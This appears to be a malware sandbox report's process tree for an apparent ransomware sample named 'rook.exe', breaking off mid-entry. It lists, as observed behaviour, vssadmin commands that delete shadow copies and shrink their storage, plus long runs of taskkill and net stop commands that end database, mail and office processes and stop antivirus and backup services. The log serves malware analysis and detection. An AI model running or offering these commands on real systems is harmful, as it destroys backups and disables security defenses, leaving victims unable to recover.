- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:3640
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2284
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5320
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5376
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5676

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:7612
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:7688
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:7740
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:7768
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7796
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7824
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7852
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7880
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7908
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7936
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7960
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7988
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8016
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8044
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:8076

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:8200
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:8232
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:8260
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:8288
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8316
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8348
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8376
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8404
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8432
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8460
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8488
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8528
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8584
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8640
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:8696

C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2360
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2584
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:768
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2952
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2984
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2068
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:860
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2128
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1052
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1360
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1900
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3056
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3204
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
  2⤵
  PID:3276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
    3⤵
    PID:3560
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
  2⤵
  PID:3360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Enterprise Client Service" /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Agent" /y
  2⤵
  PID:3460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Agent" /y
    3⤵
    PID:3872
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
  2⤵
  PID:3576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
    3⤵
    PID:3864
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
  2⤵
  PID:3604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Clean Service" /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
  2⤵
  PID:3676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
    3⤵
    PID:4004
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
  2⤵
  PID:3768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Health Service" /y
    3⤵
    PID:3024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
    3⤵
    PID:2384
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
  2⤵
  PID:3884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Client" /y
    3⤵
    PID:3164
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Message Router" /y
    3⤵
    PID:3372
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
  2⤵
  PID:3948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
    3⤵
    PID:3628
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
    3⤵
    PID:3592
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
  2⤵
  PID:4048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
    3⤵
    PID:3364
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
  2⤵
  PID:4060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
    3⤵
    PID:4000
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
  2⤵
  PID:3380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
    3⤵
    PID:3404
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
  2⤵
  PID:3564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec System Recovery" /y
    3⤵
    PID:4084
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:2376
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcronisAgent /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:3756
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:3584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Antivirus /y
  2⤵
  PID:3940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ARSM /y
  2⤵
  PID:3976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:3828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:3800
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:3560
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:3816
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:3708
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:3956
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:3776
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop bedbg /y
  2⤵
  PID:3716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:3584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop DCAgent /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:3288
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPSecurityService /y
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:3680
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPUpdateService /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:3828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EraserSvc11710 /y
  2⤵
  PID:3264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:3956
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EsgShKernel /y
  2⤵
  PID:3800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:3436
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop FA_Scheduler /y
  2⤵
  PID:3700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:3368
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IISAdmin /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:4060
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IMAP4Svc /y
  2⤵
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IMAP4Svc /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop macmnsvc /y
  2⤵
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:3212
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop masvc /y
  2⤵
  PID:3852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:3884
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBAMService /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:3564
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBEndpointAgent /y
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:3988
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeEngineService /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:4032
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFramework /y
  2⤵
  PID:3436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:3624
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:3368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:3584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McShield /y
  2⤵
  PID:3716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:3580
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McTaskManager /y
  2⤵
  PID:2384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:3996
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfemms /y
  2⤵
  PID:4080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfevtp /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MMS /y
  2⤵
  PID:4072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:3976
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mozyprobackup /y
  2⤵
  PID:3884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer /y
  2⤵
  PID:3388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer100 /y
  2⤵
  PID:3164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:3800
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer110 /y
  2⤵
  PID:3700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeES /y
  2⤵
  PID:4084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:4068
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeIS /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:3976
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:4060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:3816
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMTA /y
  2⤵
  PID:3724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:3828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSA /y
  2⤵
  PID:3568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSRS /y
  2⤵
  PID:3436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
